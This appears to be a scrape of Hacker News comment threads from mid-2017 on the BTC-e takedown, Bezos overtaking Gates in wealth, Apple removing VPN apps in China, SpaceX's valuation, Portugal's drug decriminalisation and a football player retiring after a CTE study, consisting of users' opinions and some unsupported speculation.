disillusioned 5 days ago 2 replies      
An interesting comment validated here, from 7 years ago:


mirimir 5 days ago 1 reply      
Interesting. Bitcoin stolen from Sheep Marketplace also ended up in a BTC-E account.



atmosx 5 days ago 0 replies      
I would like to know how he was arrested in Greece. Was there an Interpol warrant or something or they just made a phonecall and the Greek authorities promptly put the guy on a ship to US?
grandalf 5 days ago 1 reply      
This illustrates how the DOJ is years behind when it comes to understanding cryptocurrency technology and markets.

It won't take long for one of the cryptocurrencies with private transactions to rise in dominance, since this sort of crackdown imposes costs and uncertainty on all participants.

If the goal of the DOJ was to fight crime, the most effective approach would have been simply to infiltrate mixers and trace money flows relevant to investigations, something BTC is perfect for.

Instead, this move sends a strong signal to the cryptocurrency community that hardening measures are needed.

For instance: http://zerocoin.org/

ue_ 5 days ago 3 replies      
Interesting, I have been using BTC-E for a while, I had no idea this sort of thing happened. Was it knowingly assisted by someone at BTC-E, or did BTC-E just act as a dumb machine?

BTC-E was one of the eastiest ways for me to change BTC and LTC in day trading. Are there comparable websites with small fees? I'm not interested in buying with fiat money.

RachelF 5 days ago 0 replies      
An interesting analysis of the evidence here:

Breaking open the MtGox case, part 1 http://blog.wizsec.jp/2017/07/breaking-open-mtgox-1.html

techaddict009 5 days ago 1 reply      
Question is who has the control over BTC-e's crypto?Will they be returned to users?
aarongolliver 5 days ago 0 replies      
The website still says "down for unscheduled maintenance"
ryanlol 5 days ago 4 replies      
There's been no mentions of coin seizures anywhere as far as I can tell. Usually you'd see some boasting about that.

Perhaps these guys were actually smart about their cold storage?

agorabinary 5 days ago 1 reply      
>The takedown of this large virtual currency exchange

I haven't kept up to date on exchange volume. Was btc-e still a popular exchange (up until this takedown of course)?

stepik777 5 days ago 0 replies      
They are boasting about how they caught the guy who robbed Mt. Gox but they just did the same - a lot of people just lost access to their money on BTC-e. They are not all criminals, BTC-e was a convenient way to exchange bitcoins to/from rubles and was used by many people in Russia who were interested in cryptocurrencies.
baby 5 days ago 0 replies      
I am so happy right now that I moved my litecoins from btc-e to a personal wallet. I've learned my lesson.
SwellJoe 5 days ago 2 replies      
So, does that mean I can't get the BTC I deposited in BTC-e ages ago? I somehow didn't even know any of this was going down. (I have no idea how much it was...maybe a quarter of a coin, which is a reasonable amount of money today.)
bigbrooklyn 5 days ago 0 replies      
gruez 5 days ago 3 replies      
>Russian National And Bitcoin Exchange

So nothing will happen to the site or its owner, other than maybe they won't be able to transfer out USD.

mikob 5 days ago 2 replies      
Although I don't understand the US's involvement in this -- a man breaking the rules is being put to justice, and I'm very glad. I'm also impressed by the feds work in the cryptocurrency space. In recent years the fed has really started to reverse the trope of the government not being technologically adept. There are too many that become wealthy through illicit means and it's good news that something effective is being done about it.
sjreese 5 days ago 0 replies      
Where is the FBI in this? It was a FBI black op against silk road -> follow the money! Who was silk road's bank < Mt Gox - Who bankrupt Mt Gox < FBI Who had access to Trademill database < FBI Who authorized the attack on BitCoin after saying don't use it's not safe < FBI Today the seizure of all BitCoin in BTC-e is done by the FBI - Hopefully the number of FBI SA's going to jail over this Black Op will be limited. But, their greed is transnational to hide their seizure of overseas assets.. that is, What was seized and who accounted for it! Think DrugWar - we will be looking for SA's living beyond their means as with silk road
Jeff Bezos Surpasses Bill Gates as World's Richest Person bloomberg.com
461 points by fargo  5 days ago   405 comments top 35
kens 4 days ago 16 replies      
I think most people don't realize just how much money the richest people have. People generally think of normal(ish) distributions like height, where if you're 10% taller or shorter than average, you're a tall or short person, and 40% taller makes you the tallest person in the world. In comparison, wealth has a very, very long tail, making it hard to comprehend.

Here's what I've come up with to visualize wealth in the United States. Suppose you start counting, going up by 1 million dollars every second, and people sit down when you reach their net worth. Most people will sit down immediately. After about 9 seconds, people in the "1%" will start sitting down. Near the 17 minute mark, billionaires would start sitting down. Donald Trump would sit down just before the hour mark. A day later - an hour and 10 minutes into the second day of billionaires sitting down - Bill Gates would sit, followed by Jeff Bezos just three minutes later.

The point of this is there's a huge range of billionaires (analogous to comparing 17 minutes to a day). The 1% hardly even registers on this scale (a few seconds). (I should also mention that there should be huge error bars on reported net worth numbers.)

vanderZwan 5 days ago 7 replies      
Hasn't Bill Gates mostly been focused on spending his fortune as effectively as he can on philantropy for the last decade or so? In that light it's more amazing it took that long.
Verdex_2 5 days ago 4 replies      
_Codemonkeyism 5 days ago 5 replies      
I was one of the guys writing M$ and annoyed by the shady business practices of Gates.

Today he has my utter respect on how he tranformed and how he spent his money.

m12k 5 days ago 6 replies      
Officially at least - there is a chance that Putin is actually the richest person in the world: https://www.theatlantic.com/politics/archive/2017/07/bill-br...

"He wasnt saying 50 percent for the Russian government or the presidential administration of Russia, but 50 percent for Vladimir Putin personally. From that moment on, Putin became the biggest oligarch in Russia and the richest man in the world, and my anti-corruption activities would no longer be tolerated."

Dirlewanger 5 days ago 3 replies      
So when do we think Bezos will go on the typical billionaire philanthropy track? Actually, a better question is probably will he even? At Bezos' age, Gates was already in a backseat role with most of his non-philanthropic ventures. Though he shares some similarities with Gates, he shows no signs of stopping. He seems actually content with Amazon eating the world, and I don't think it will be a net positive for humanity.
JustAnotherPat 5 days ago 1 reply      
I wonder at what point the world's richest will no longer include those philanthropically inclined like Buffet, Gates, and Bloomberg and will be dominated by the likes of Bezos, Slim, and Ortega. (The jury is still out on Zuckerberg and his dubious initiatives)

Our global economy is trending towards benefiting only the most ruthless, even at the very top.

throwaway328832 4 days ago 0 replies      
Money frankly is irrelevant beyond a certain point (and most of it is in the form of share holdings anyway).

I'd be more worried about the power/political influence these individuals wield. There is generally an incestuous coterie of the rich that one gets access to after a certain point, where the destruction of freedom is lubricated with champagne and caviar. Bildeberg/IMF/WTO/G20 etc. are symptomatic of such cabals of corporatocracies and their retainers in the state apparatus that wield power over the world.

DannyB2 5 days ago 3 replies      
This probably does not change Bill Gates' enjoyment of day to day life, or lack thereof, whatever the case may be. It depends on whether Bill Gates is obsessed by these kinds of facts, or whether he can enjoy life without a tiny hand size measuring contest.
nolok 5 days ago 0 replies      
I cant entirely decide if I find that graph [1] more impressive or terrifying. Look at the time scale and the speed at which Bezos' net worth increased, while starting at the already insane point of 30 B.

[1] https://assets.bwbx.io/images/users/iqjWHBFdfxIU/iVJAUVVd7l0...

bvm 5 days ago 5 replies      
Is there a measure of the most fully liquid richest person? i.e. the individual that holds the most cash.
shimon_e 5 days ago 2 replies      
Somewhere there is a community of retailers that hates Amazon as much as Slashdotters hated Microsoft.
neiled 5 days ago 2 replies      
I was surprised by this. Anyone know the levels of philanthropy of Bezos vs Gates? I've ready many times of the great work and resources (money and otherwise) that Mr Gates has contributed to many causes.
losteverything 4 days ago 0 replies      
From the article" Anyone who joins Prime shops in retail stores 10 percent less, and that number will keep accelerating as Amazon adds more inventory.

Id love to know the analysis on this.

I deliver to amazon addicts and prime-ers. Although, yes, they order often (5-6 days a week) the volume of items by count is tiny compared to a shopping cart at a store.

droidist2 5 days ago 0 replies      
Damn it, why did I sell half my Jeff Bezos stock
VMG 5 days ago 0 replies      
Prime Day paid off it seems
arsenal 4 days ago 0 replies      
How much of that money is he actually giving away to uplift other people? A lot to catch up on Bill Gates there
jcmoscon 4 days ago 0 replies      
So to understand how much money he has let's say Jeff Bezos is walking in the street and sees US$42,000 laying on the ground. He is so rich that it's not worth for him to stop and get the money. It's like you and me seeing a 10 cents coin on the ground. That's his life.
krapp 5 days ago 2 replies      
Just imagine the quality of head wax he can afford now.
0xbear 4 days ago 0 replies      
BillG has been giving away something like $2B a year for the past 15 years. He's not really holding onto the title very much.
gpawl 4 days ago 0 replies      
Only on a technicality, because Gates's Net Worth doesn't include money in the foundation that Gates controls.
odiroot 5 days ago 0 replies      
I wonder how does his security detail look like.
pavlakoos 5 days ago 0 replies      
Well deserved, I'm afraid.
4010dell 4 days ago 0 replies      
Ok, thanks for the info. Now, i can pass rest of my day miserably.
dluan 5 days ago 0 replies      
Something in the water in Seattle
swehner 5 days ago 0 replies      
You guys haven't been keeping up the boycott, have you?!
advertising 5 days ago 0 replies      
Except it's Putin
miguelrochefort 5 days ago 1 reply      
I call 100 billion by 2019.
_pmf_ 5 days ago 0 replies      
Best paid CIA operative.
dumbfounder 5 days ago 0 replies      
Congrats dude, well earned. I expect him to put some serious space between him and rest of the pack in the next 10 years.
kooky5489 5 days ago 0 replies      
It should be Elon Musk!! He is the ultra billionaire we deserve...
bmcusick 5 days ago 4 replies      
This is wonderful news for humanity, in the long term. Bezos is dedicated to expanding humanity into the solar system in a more sensible way than Musk is. O'Neil cylinders are really the way to go for a lot of reasons, and that's the vision that Bezos is dedicated to. More money for that is fantastic.

I just wish there was a Bezos/Gates-level billionaire who care as much about life extension via SENS. That's the only thing of equal importance I can think of that needs long term vision and financial support.

Tomis02 4 days ago 0 replies      
Kind of surprised to see this so upvoted, I was under the impression that "top N richest people" articles only impress kids and the immature. Don't have a source for it but I'm pretty sure people with more than a few hundred million in the bank couldn't care less if they're richer or poorer than someone else, as they haven't made their fortune by worrying about frivolous things. But that's just me.
efficax 5 days ago 3 replies      
I find it weird to report on this like it's a race or competition. His net worth bump right now is entirely due to rash market speculation and the recent tech bubble. When the crash comes (and it will), AMZN could easily be down to $500 in a week, and he'll just be insanely rich again.
Apple Removes Apps from China Store That Help Internet Users Evade Censorship nytimes.com
430 points by mcone  3 days ago   420 comments top 44
coldcode 3 days ago 17 replies      
You cannot do business in China without doing what they tell you. Period. Either you do it or you leave. I work for a big company (you would all know) and we have a large business unit in China, they own 52% of it. They decide what goes in and how customers can use it. We don't get to decide anything without government approval. It's so easy to claim the West shouldn't do what the leadership of China wants in China, but in reality the only alternative is to abandon China to those who will do what they are ordered to. The market is too large to leave. If you don't agree to their rules you don't play in their sandbox.
janandonly 3 days ago 10 replies      
What happens in China now could happen in 5 years in the rest of the world.

For "security" reasons or "fight agains terrorism", while it's really a fight between those in power and those who want power :-(

The need for IPFS, webRTC and other non-centralized protocols becomes more pressing every day, to defend everyone who is stuck in between.

pipio21 3 days ago 5 replies      
Just common sense, given that the China gobertment has made usage of VPNs illegal.

What do you expect?

People in China could continue using app store accounts created in other countries as usual.

And most educated people continue using VPNs too. Normal people are becoming experts in encription, security...

It worries me more that countries like the UK and the US want to follow China, in that order.

bobjordan 2 days ago 0 replies      
My business has an AWS China account and below is the email I received on Friday. It is definitely a crackdown year, on several fronts even other than the internet. Like this year I was forced to pay a $300 fine because I didn't report to the police station within 24-hrs of re-entry while living in my own leased home. Now, my company is not huge but I've employed +100 people and we pay a lot of taxes, social insurance, provide jobs for local families. They do not give a shit about that you will follow the laws of China to do business here or you will be thrown out.

Overall, this year has really chilled my enthusiasm for getting too comfortable with the thought of living here the rest of my working life. In this age with so many elite Chinese being trained and educated abroad, it is really hard to beleive things are going in this directon. I mean, IT Is already hard enough, we need a server in our office that is connected to another server in France, and we need it reliable and without issue. Making this type of stuff even harder on us as a business is really irritating. I really do tell myself every day "if it was easy everybody would be doing it".

"Dear Customer, According to the telecom regulations and the requirement of MIIT/MPS and Internet supervision agency, please check up two parts below. The illegal over the wall proxy sites and provide hosting campaign service for illegal over the wall proxy sites.All main domains which dont have ICP recorded number via MIIT and All websites which have illegal content. We will continuously receive notification from the regulators to close such services or shut down server deployment immediately. In case your will be involved in any consequences of such violation, please stop immediately if you have such illegal services and deployment. Thanks for your understanding and cooperation.

Regards,AWS China (Beijing) Region operated by SINNET"

adamnemecek 3 days ago 1 reply      
Hey Timmy, what was all that talk about customer security?


And here I was, almost believing you.

Tepix 3 days ago 1 reply      
You don't need their closed app store. Free workaround:

apply for a free Apple developer account,

compile your own copy of https://github.com/mtigas/OnionBrowser or https://github.com/yuyao110120/ShadowVPN-iOS and

install it on your own iDevice

abecedarius 3 days ago 2 replies      
If you build in the ability to censor, you can't disclaim responsibility when a state makes you do it. We'll see the same sort of thing in Russia, the UK, and so on. Apple can still act, if they wish, by not locking down their users. I know that'd be a big step for them.
libeclipse 3 days ago 2 replies      
What a despicable joke of a country. And shame on Apple for aiding them while they made such a massive deal of user rights in the US.
saurik 3 days ago 1 reply      
They also require a paid developer subscription to get access to the Network Extensions capability (needed to build a VPN protocol extension) in order to make sure people who develop these apps can't just provide IPA files for normal users in China to "sideload" using tools such as my Cydia Impactor.
mauvehaus 3 days ago 4 replies      
This from the company that removed the headphone jack from their phones while crowing about the "courage" involved in making the decision.

I'm not going to pretend to believe that Tim Cook's letter (cited elsewhere) was much more than a PR move in a country they were unlikely to face any substantial consequences for (at least publicly) standing up to the government, or that I really believe that corporations have a responsibility to protect basic human rights (though it would be nice if they did). Still, it'd be nice if corporations didn't try to have it both ways and maintain an image as a courageous force for good when it was convenient while washing their hands of responsibility for any actual action when it became difficult.

nsxwolf 3 days ago 1 reply      
Why hasn't iMessage been blocked in China? Does apple run a special compromised version of it there, or has China simply not made banning it a priority yet, or is iMessage simply not as secure as we have been told?
maxxxxx 3 days ago 3 replies      
That's why corporations will never help against dictatorship. They may do it if it's convenient but in the end they will prioritize money over everything else and fall in line with dictatorships. Happened during the Nazi time, it's happening in China now.
imron 3 days ago 1 reply      
Alternative title:

Apple complies with law in countries where it operates.

mnm1 2 days ago 0 replies      
The entire Apple platform is designed to restrict the user and prevent anything that Apple doesn't want to happen from happening. This is Apple's decision only and it's in line with all their other decisions that restrict a user's freedom on their closed, non free platform. If people wanted a platform that would run whatever software they wanted without restrictions, they shouldn't have bought Apple period. That's just dumb to expect a closed, non free platform that censors by default to suddenly do a 180 turn and become free. But hey, it's not like people haven't been saying this for decades now is it? Oh right, people like RMS have but most consumers are too stupid to listen. This is the outcome.
saimiam 2 days ago 2 replies      
I see a lot of very cogent arguments defending Apple as only following the law when it comes to VPN laws of China.

I'm not old enough to know this first hand but I believe the anti-apartheid movement against South Africa was started by students and spread to the corporate world before world governments stepped up to ban doing business with South Africa.

This seems to be a specific example of corporate advocacy leading governmental policy.

If the Chinese government's rule over the Chinese people is so egregious to the world, I think Apple would be on solid ground if they refused to do business in China and also refused to do business with Chinese companies outside China.

skybrian 3 days ago 0 replies      
They probably had to do it to keep the official store available in China, but this is why supporting side-loading of apps like Android does would be a good idea.
humanrebar 3 days ago 2 replies      
At what point does Apple itself bear some responsibility for censoring people?

EDIT: Would downvoters please explain their objection to the question? "Apple isn't to blame" and some thoughtful elaboration would be better than just downvoting.

bigtoine123 3 days ago 1 reply      
This is horrible, but in England and America, I'm 100% certain that similar policies will be applied - in the name of law, and public security.
vkou 2 days ago 0 replies      
Isn't it wonderful that the iPhone is a walled garden, and with the flick of a switch, an entire category of software cannot be ran on it?

The fact that this switch exists is the real tragedy here - not the fact that Apple chose to use it.

drefgert 3 days ago 0 replies      
Tech companies must play a long political game and spend their vast fortunes to lobby, to own media and influence policy and control the message.

Once they do this the will no longer be in conflict with governments and their policy.

Take note in coming years as the tech barons buy up media to control the message.

They will of course do this and then the real problem will not be uppity governments but mega tech corporations who semi covertly run the world.

saurik 3 days ago 0 replies      
They also require a paid developer subscription to get access to the Network Extensions capability (needed to build a VPN protocol extension) in order to make sure people who develop these apps can't just provide IPA files for normal users in China to "sideload" using tools such as my Cydia Impactor.
retox 3 days ago 0 replies      
Profits before people, the Apple motto.
dmritard96 1 day ago 0 replies      
I always wonder about Hong Kong now that it is under the one country two systems - basically, I wonder if internet censorship will be lessened before HK internet openness disappears.
baozilaile 2 days ago 0 replies      
To all in HN:

It is a huge market which helping the people in China break the GFW (Great Fire Wall).You can start a startup for that :)

Crontab 3 days ago 1 reply      
This is awful, but in England and America, I foresee similar policies will come - in the name of law, safety, and security.
perfectstorm 2 days ago 0 replies      
Doesn't iPhone supports native VPN in Settings ? How are they going to prevent users from using that ? I mean it's not as easy as downloading a dedicated app and logging in but using the Settings app is not much of a work.
belltaco 3 days ago 0 replies      
But with Windows/Linux its still possible to install apps on you own, unlike the locked down app store.
oneplane 3 days ago 0 replies      
It's not very surprising considering that it's the local law and everyone will have to follow it or get out...

It isn't going to actually prevent anyone from tunneling past the great firewall of course, so it's more like a gesture than an actual effective decision from the government.

jonbarker 2 days ago 1 reply      
w8rbt 2 days ago 0 replies      
samcat116 2 days ago 1 reply      
I assume they are still allowing manual VPN configurations right? They are only removing apps that configure it automatically for you. Not downplaying the impact of this, just clarifying.
sipCom19 3 days ago 1 reply      
Apple is free to do what it wants, I'm free not to buy their stuff.
secfirstmd 3 days ago 0 replies      
Terrible news.

So lets start tackling the problem and figuring out ways to help the averave Chinese person evade censorhip without developer accounts and the knowledge to compile...

csomar 2 days ago 0 replies      
Apple tailors to countries. They made an iOS without facetime for Dubai specifically.

It's a good thing, however, that they are fighting for privacy where they can.

shpx 3 days ago 0 replies      
Stallman was right.
pmarreck 3 days ago 1 reply      
Perhaps some free-speech provision should be part of the Universal Declaration of Human Rights
ComodoHacker 2 days ago 0 replies      
Russia is next. They just have passed a law to ban VPNs and anonymous proxies.
gigatexal 3 days ago 0 replies      
I wonder what Orwell would have thought of modern China.
joseph4521 3 days ago 4 replies      
Seems that Apple is just following, with much delay, the law of People's Republic of China. I don't understand why some people think companies should be above the law.
adamnemecek 3 days ago 4 replies      
Hey Timmy, what was all that talk about customer security?


And here I was, almost believing you.

You're a coward.

allenleein 3 days ago 1 reply      
What would Steve Jobs do?
the_common_man 2 days ago 1 reply      
I find all this outrage about Apple not taking a stand highly amusing.

Practically every single product used in the western world is made in China. Please report back if you can get rid of all those products at a _personal_ level. For a start, looks like I have throw this laptop away. Not going to happen.

microcolonel 3 days ago 1 reply      
Next China will outlaw Linux for having an IPSec implementation in it, lol. What a sad country that believes liberty comes after wealth, and in relative terms may never have either.
SpaceX Is Now One of the Worlds Most Valuable Privately Held Companies nytimes.com
421 points by iloveluce  4 days ago   293 comments top 24
loeg 4 days ago 11 replies      
> Mr. Musk faces competition from another billionaire. Blue Origin, a rocket company founded by Jeff Bezos, the chief executive of Amazon, aims to send tourists and supplies into space.

Is that line even close to true? Last I heard Blue Origin was years away from revenue and far behind SpaceX in terms of capability and manufacturing.

skinnymuch 4 days ago 1 reply      
Forbes seems to have always been wrong about Musk's net worth unless I'm missing how it works. By my estimations, now he should be worth around $23B. $11B from Tesla. $11.5B from SpaceX.

Obviously they haven't updated for this news yet, but they still won't be at $23B.

Regardless, going from having invested all is PayPal money by 08 and in dire straits to being $20B+ 9 years later is awesome. And depending on what narrative you believe, money to this degree isn't what he cares about anyway.

Kudos to Elon, SpaceX, and everyone working there.

strictnein 4 days ago 4 replies      
I mean, SpaceX is great and all, but it's no Cargill or even in the same league as Cargill or other similar companies like Koch (which is #2 in the US):


 Revenue: US$109.6 billion (2017)[1] Net income: US$2.835 billion (2017)[1] Total assets: US$55.8 billion 25% of all United States grain exports 22% of the US domestic meat market

dbosch 4 days ago 3 replies      
"World's most valuable privately held companies".Sounds weird, no?

What about Vitol (https://en.wikipedia.org/wiki/Vitol), Saudi Aramco, Koch Industries (https://en.wikipedia.org/wiki/Koch_Industries) ... etc ?

gaius 4 days ago 5 replies      
It makes me sad that SpaceX, a company that actually invents and makes stuff, is mentioned alongside Uber whose only product is evading taxes and regulations
yellow_postit 4 days ago 1 reply      
As much as I'd love to invest I'm glad they're avoiding the short term outlook being publicly traded would demand.
Overtonwindow 4 days ago 3 replies      
The best thing Mr. Musk can do, in my humble opinion, is to never, ever take SpaceX public.
protomyth 4 days ago 2 replies      
Shouldnt the title include some qualifier like tech company, because there are private companies like Cargill out there that have yearly revenue above $20 billion.
martinmusio7 4 days ago 0 replies      
Thinking about it a bit more, I don't believe that Blue Origin and SpaceX are competitors. In a sense yes, but they will not fight for customers. I believe there is very much demand for their services.
NumberCruncher 4 days ago 1 reply      
And what about Basecamp with its 100 billion valuation?
omarforgotpwd 4 days ago 4 replies      
In what world is SpaceX valued at $20B while Uber is valued at $69B?
mxschumacher 4 days ago 0 replies      
No it is not. One of the most valuable private startups maybe.

Here's the top 15: https://en.wikipedia.org/wiki/List_of_largest_private_non-go...

fnord123 4 days ago 0 replies      
So what are the most valuable private companies? Ikea, Bloomberg, Dell, Koch, Cargill, Bechtel, most of the big 5 accountancy firms...

I'm not so sure SpaceX is "one of the world's most valuable privately held companies".

Animats 4 days ago 1 reply      
Space-X is, at long last, getting their launch rate up. 9 Falcon-9 launches so far this year. For a while, they had commercial customers canceling because they were way behind on their launch schedule. It's quantity of successful launches that makes money in that business.

Not much is happening at the Brownsville TX site, where Space-X still hasn't done much more than pile up dirt and wait for it to settle. They're building on beach sand. They really need that site so they can have more pad time.

JumpCrisscross 4 days ago 3 replies      
Excellent news, even if the round is peculiarly undersized. First time I've seen them be so coy with the identity of the investor, too.
skinnymuch 4 days ago 0 replies      
It's surprising how little money was taken in this round. You'd have expected something closer to $1B. I'm sure $350M will help enough and it has been over 2 years since the last funding. So maybe it's fine. They can keep raise again soon if need be.

Especially with Bezos pumping $1B into Blue Origin a year.

martinmusio7 4 days ago 2 replies      
Bezos is coming .. already $1B a year from Amazon stock. And Amazon is more successful every year. I am very curious how things will go.
RikNieu 4 days ago 0 replies      
Is it just me or does it seem absurd that a company like Snap would have a comparable market valuation to SpaceX...
miheermunjal 4 days ago 0 replies      
as an engineer doing non-hardware engineering, it is always satisfying to watch SpaceX succeed from afar.
cli 4 days ago 3 replies      
Is a private company's value akin to a public one's market capitalization? How is this determined?
supernumerary 4 days ago 0 replies      
Gradatim Ferociter baby
bitxbitxbitcoin 4 days ago 0 replies      
No surprise there.
_pmf_ 4 days ago 1 reply      
Privately held, taxpayer funded, like most of Musk's endeavors.
14 Years After Decriminalizing Drugs, Portugals Bold Risk Paid Off mic.com
412 points by cirrus-clouds  3 days ago   127 comments top 17
lmickh 3 days ago 12 replies      
Find it misleading that almost all of the recent articles on this subject talk about decriminalization as the cause for the drop in drug related health issues.

They shifted a significant chunk of money to health services. If it proves anything, it is only that health services can reduce drug related health issues. Without a control, there is nothing to point to regarding criminalization vs decriminalization. People are now paid to go out to drug dens and offer medical help. You can't simply say "people were scared to get help before" when instead you start sending help straight to their location.

Even when an article mentions the change in spending/focus, it is framed in the context of legalizing drugs. No one is making articles titled "After years of improving health services, Portugal's drug policy paid off".

I get that some folks want to legalize drugs, but make an argument for it that doesn't involve this twisting of results to match the desired outcome.

shawnee_ 3 days ago 2 replies      
Portugal's performance in perspective: Only three people for every million die of a drug overdose in Portugal, which puts one of the eurozone's poorest countries in a different league than rich international powerhouse Germany (17.6 per million) and in a different universe than social democratic utopia Sweden (69.7 per million).

There's a fascinating documentary called American Addict on what nearly happened before this happened:

"In 1971 President Richard Nixon declared war on drugs. He proclaimed, Americas public enemy number one in the United States is drug abuse. In order to fight and defeat this enemy, it is necessary to wage a new, all-out offensive(Sharp, 1994, p.1). Nixon fought drug abuse on both the supply and demand fronts." [source]

Before criminalization, the trend in society was to start treating people who are afflicted with addictions like the sick people they are, rather than like criminals. There was an entire movement toward recovery as a necessary way of life for some people who cannot moderate alcohol intake (or drugs or whatever), just like insulin is a way of life for diabetics whose pancreases can't moderate insulin.

Addiction is not a moral issue; it should not be criminalized. It is a medical issue. It is a mental health issue. When it's caught early enough, and treated with the proper mental health regimen, it does not have to be debilitating.

Instead, what happened with war on drugs was mass-market criminalization... essentially forcing alcoholics and addicts forced into debilitation (hiding / shame)... leading to further desire for escapism through the addiction. It's a terrible cycle, and the worst part of it is that some counties have made things like DUIs into their bread-and-butter mainstream source of revenue.

It's hard to say what the trend today is going toward. The privatization of jails is especially disconcerting; like society wants to trick itself into thinking that the more people it has locked up the "safer" it is.


untangle 3 days ago 4 replies      
The singular focus on "drug deaths due to overdose" tells an important part of the story, but not the whole story. For example, per Wikipedia, drug use may have doubled after decriminalization.* If so, that's an acceptable tradeoff to me but may not be to others.

* https://en.wikipedia.org/wiki/Drug_policy_of_Portugal

drefgert 3 days ago 2 replies      
The critical part missing from portugals policy is that drugs must be legal to buy and sell (via controlled channels).

Decriminalizing use helps, but legalizing sales take out the crime and ensures the health of users through clean product.

justaaron 3 days ago 0 replies      
I want to point out that this is merely a heroin-inspired "harm reduction" law that removes the criminal penalties from having some arbitrary few number of days supply of any particular illegal substance. (10 days)

It does not recognize any distinction between substances and retains a "shame on you" psy-ops bureau that users caught with minor amounts of said substances are referred to, in lieu of the criminal justice system. This "toxic-dependency" panel has sanctions available including monetary fines and revocation of ones passport or other travel restrictions, to bend one to their ways.

This set of laws does not treat the SUPPLY chain at all!

If one has an amount of substance greater than the threshold one can expect charges of traffic/distribution, which then will collapse after the 1 year investigation results in the non-election to pursue such charges, which has meanwhile resulted in the de-facto punishment of 1 year of weekly(some interval) police-station-sign-ins and a form of house arrest.

It's not a complete set of laws, and while it did manage to dispatch the heroin crisis of years past, it doesn't make any distinction, and thus is impeding efforts towards home cultivation of cannabis being legalized, etc.

De-criminalization, like medical cannabis, has the unfortunate tendency of providing laurels to rest upon, and thus impeding further progress. (observe Spains cooperatives, where signed members cooperatively grow and share in the crop)

Basically, Portugal has a very mature attitude to many things: letting the golden dreams of empire fade as they should, accepting that some people behave rashly and putting an emphasis on harm reduction etc.The emergency services here generally are excellent, professional, and calm in demeanour.I don't think that in practice one notes any major difference in drug usage in society with regards to the rest of Europe, I think one simply notes a bit less paranoia.

By comparison, I find it very odd that more than 15 states in the USA have medical or legal cannabis, yet harm reduction for heroin seems to be missing, and hence I'll just say that some people like to learn the hard way :D

11thEarlOfMar 3 days ago 1 reply      
It would be illustrative to see a control of some type, perhaps deaths due to alcoholism. Seeing that trend against the heroin trend would help to illustrate the impact of decriminalization relative to other efforts or changes in law or society.
petre 3 days ago 1 reply      
Romania is on the last place according to the chart in the article and drug possesion is a criminal offense in this country. It's punishable by two to five years in jail. The rehab is inside the penitenciary, so you first go to jail, then to rehab.

Also it's quite interesting how just about every country that's close to the Netherlands, save for France which criminalizes posession, is at the top of the chart.

I've been to Lisbon and was approached countless times on the street by shady individuals trying to sell drugs, usually mj/hash but also coke, maybe one time out of ten. This is not a widespread thing in the rest of Portugal, just in Lisbon's very touristy city centre where.

wwwater 2 days ago 0 replies      
There is an amazing TED talk by Johann Hari on that topic https://www.ted.com/talks/johann_hari_everything_you_think_y...
tompazourek 3 days ago 3 replies      
When I saw the chart I thought, what's wrong with Estonia?
cpncrunch 3 days ago 2 replies      
In Canada we seem to have de-facto criminalization for possession for personal use. The problem we have now is that 80% of heroin is laced with fentanyl (at least in Vancouver), and it's causing a huge overdose problem. Even cocaine and MDMA is now sometimes cut with fentanyl.

Not sure what the solution is, but perhaps a combination of stronger penalties for dealers, more resources for treating addiction, and legalising weed.

randyrand 3 days ago 0 replies      
> People caught with less than a 10-day supply of a drug

That's a tiny amount. Punishing people that like to buy in larger quantities for convenience seems silly. They should have come up with a another or increased metric to determine who the dealers were.

perilunar 3 days ago 0 replies      
> As Joo Goulo, the architect of Portugal's decriminalization model, told Hari, "using drugs is only a symptom of some suffering, and we have to reach the reasons."

Not necessarily. Using (harder) drugs is no more an indication of mental health problems than using alcohol. Many people use drugs recreationally without becoming addicted.

marze 2 days ago 0 replies      
Is this a correct summary?


150 deaths/million/year


3 deaths/million/year

randomstudent 3 days ago 1 reply      
This article is very weak... They cherry pick a single metric (overdose-related deaths) and use that to prove Portugal's policy is the best thing ever.

Other metrics that are relevant: Has drug use increased or decreased? What about the burden of disease associated with drug use? Also, even more importantly: What has happended to deaths in other countries over time?

Odenwaelder 3 days ago 0 replies      
Has this guy walked the streets of Lisbon? You can't walk 50m without being offered drugs. It sucks.
crimsonalucard 1 day ago 0 replies      
What does it mean to have a lower OD rate if legalization caused the entire population to become addicts? There needs to be a more comprehensive and less biased examination on what happened to this country. Anyone know the addiction rate vs other countries?
vivekd 3 days ago 1 reply      
Counterpoint, overdoes deaths increased during some years and drug use has markedly increased:

Also the chart supporting less overdose deaths seems to be actually a chart about all drug induced deaths, and not just overdose deaths, which means it could include HIV/AIDS, once a big killer of heroin users which we can now treat for much better.


Ravens OL John Urschel, 26, retires abruptly, two days after CTE study espn.com
484 points by petethomas  4 days ago   335 comments top 28
aresant 4 days ago 9 replies      
A few colorful facts to the story here:

1) 3 years of service vests into NFL pension plan, he just hit qualification - value pegged at $21,360 a year for life (3)

2) He has not publicly commented on his retirement or reasons for it.

3) He has a hugely awesome secondary option - doctorate of math at MIT

4) He was at end of his rookie contract, next year would be the "in the money" year for him so he is clearly leaving a lot of cash on the table.

5) Over three years he "only" earned ~$1.8m http://www.spotrac.com/nfl/baltimore-ravens/john-urschel-145... - which after tax is 7 figures but still not a lot.

6) He has been notoriously thrifty, living on $25k a year and driving a used car (2). So would imagine at some level he has been planning this outcome, or leaving option wide open.

(1) https://www.washingtonpost.com/news/early-lead/wp/2017/07/27...

(2) http://www.baltimoresun.com/sports/bs-sp-ravens-john-urschel...

(3) http://firstquarterfinance.com/nfl-pension-plan-retirement-p...

magic_beans 4 days ago 5 replies      
"Urschel is pursuing his doctorate at the Massachusetts Institute of Technology in the offseason, focusing on spectral graph theory, numerical linear algebra and machine learning."

This guy has a back-up plan. Good man.

meri_dian 4 days ago 2 replies      
He clearly loves math so the CTE study may just have been the straw that broke the camel's back. He may have been yearning to fully devote himself to math for a while now.

Regarding the broader debate that seems to be swirling along the lines of 'should we ban Football or not', I strongly believe we should not.

If parents want to prevent their kids from playing football, great, that's their choice to make. But if they allow them to play, we have to keep in mind that only a very small percentage of players will continue on to play in college, and then only another fraction of those players will continue on to play in the NFL. I'm sure that people who play youth and high school football but stop playing after HS graduation have a much lower incidence rate of CTE than players who continue on to play at the collegiate and professional levels. So for the vast majority of football players CTE isn't much a risk.

Because those who do reach the highest levels of the sport make tremendous amounts of money, as long as they are aware of the risks, they should be able to make the decision for themselves.

grogenaut 4 days ago 3 replies      
Summary: a national football league player, and PhD in math from mit, John Urschel, abruptly retired 2 days after a study showing 99% of retired NFL players from a study group had chronic brain issues (Cte). This is right before training starts for the season.

